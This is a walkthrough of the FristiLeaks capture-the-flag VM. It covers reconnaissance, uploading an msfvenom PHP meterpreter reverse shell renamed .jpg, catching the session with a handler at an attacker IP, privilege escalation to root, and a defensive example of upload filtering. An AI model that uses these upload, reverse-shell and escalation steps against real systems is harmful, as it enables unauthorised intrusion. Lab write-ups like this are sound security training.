Hack the Fristileaks VM (CTF Challenge)

Today we will walk through the FristiLeaks VM. Nothing is known about this VM except that its difficulty level ranges from beginner to intermediate. Also, this VM only works with the MAC address 08:00:27:A5:A6:76; with any other address it will not work.
WalkThrough
As always, we start by finding our target.

netdiscover


Our target is 192.168.0.101. Now scan the target with nmap.
nmap -p- -A 192.168.0.101


The result shows that port 80 is open, so let's open it in the browser.


Nothing on the page or in the page source proves to be useful. So we used nikto to check it thoroughly and found three directories: /sisi, /cola and /beer. All three of these directories showed the following image:

On this page too there was nothing in the page source, and there was no metadata behind the image. Then it occurred to me that fristi is also a drink, like cola, beer or sisi, and there was a reference to it on the home page, so there is a possibility that fristi is also a directory here. There was no harm in trying it.


The attempt was successful: we found an admin portal with an image. Let's look at its page source.


In the page source you will find a very different piece of code, as shown above. Copy this code, then right-click on the image and select Inspect Element (Q).


After clicking on the option, a tab will open.


Select the longer code there and paste the code you copied earlier in its place.


Once the code is pasted, you will observe that the image is gone and some text appears. This text could be a password. And if you remember, the page source contained the word eezeepz, which could be our username. You can see it in the image below.


Enter the username and password and log in.


Once you log in, you will find a page where you can upload something. So here we will upload our malicious file. To generate it, go to your terminal in Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 -f raw


Copy the code from <?php to die(); and save it in a text file with a .php extension. When you try to upload it there will be an error, so just change the extension to .jpg and upload it.


Once the file is uploaded, type 192.168.0.101/fristi/uploads/shell.php.jpg in the browser to run it.
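
The renamed file gets past the upload form because of how the name is checked. The following is an added example, not part of the original walkthrough or the VM's code, showing the defender's side: a last-extension check (an assumed model of the filter) next to a stricter one. The function names, allowlist and sample bytes are constructed for illustration.

```python
import os
import secrets

ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}          # assumed allowlist
EXECUTABLE = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def weak_check(filename):
    """Assumed model of a filter that only looks at the last extension."""
    return os.path.splitext(filename.lower())[1] in ALLOWED


def strict_check(filename, content):
    """Return (ok, reason); every dot-separated segment is inspected."""
    name = os.path.basename(filename.replace("\\", "/")).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no usable extension"
    final = "." + parts[-1]
    if final not in ALLOWED:
        return False, "extension not allowed"
    # A handler mapped by extension can match any segment, not just the last.
    if any("." + p in EXECUTABLE for p in parts[1:-1]):
        return False, "executable extension inside name"
    if not content.startswith(MAGIC[final]):
        return False, "content does not match extension"
    return True, "ok"


def stored_name(filename):
    """Server-chosen name: random stem, single validated extension."""
    ext = os.path.splitext(filename.lower())[1]
    return secrets.token_hex(16) + ext


# Constructed sample inputs (not taken from the VM).
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SCRIPT_BYTES = b"<?php /* placeholder */ ?>"

if __name__ == "__main__":
    for fn, data in [("photo.jpg", JPEG_BYTES), ("shell.php.jpg", SCRIPT_BYTES)]:
        print(fn, weak_check(fn), strict_check(fn, data), stored_name(fn))
```

Storing uploads under a server-chosen name and serving the upload directory with script execution disabled removes the dependence on the filename check alone.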


Once this is done, you will get a meterpreter session. To get this session, type:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 4444
exploit

When the session is received, type shell to drop into a shell, and then run the following commands to get a terminal:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py


Then go to the www folder by typing:
cd www
ls -al (this command lists the files and folders)
Here we found a notes.txt. Let's read it.
cat notes.txt


In notes.txt there is a message from jerry hinting that we should go to the home directory. Let's try that by typing:
cd /home
ls -la
Here you will find a list of all the usernames. If you try to enter any folder it says permission denied, except for the eezeepz one. So type the following to go into it:
cd eezeepz


Once you enter the eezeepz folder you will again find a notes.txt. Read it.
cat notes.txt


Again, notes.txt contains a message from jerry telling us what to do. So let's follow his steps by typing:
echo "/usr/bin/../../bin/chmod -R 777 /home/admin" > /tmp/runthis
After typing the command, go back to the home folder and from there go into the admin directory.
cd /home
ls -la
cd admin
ls -la


In the admin directory you will find three important files: cryptedpass.txt, cryptpass.py and whoisyourgodnow.txt. Read these files one by one:

cat whoisyourgodnow.txt
cat cryptedpass.txt
cat cryptpass.py


Two of them will show some data in Base64-encoded form. These could be passwords. Decode it and it will give you the word LetThereBeFristi!
Now switch users by typing:
su fristigod
And then give the password when asked, i.e. LetThereBeFristi!
Then, to check the id, type:
id
And to check the list of files, type:
ls -la


Now go to /var and check what files it has. For that, type:
cd /var
ls -la
You will find a folder called fristigod. To enter it and see its contents, type:
cd fristigod
ls -la


In here you will find a file called .bash_history. It contains all the commands that were previously used by admin. Let's read it.
cat .bash_history


We will try one of them, namely:
sudo -l
And give the password when required.


Now, to reach the flag, run the following commands in order:
sudo -u fristi .secret_admin_stuff/docom /bin/sh
id
cd /root
ls -la
cat fristileaks_secrets.txt


And VOILA!!! You have extracted the flag. Congratulations. 
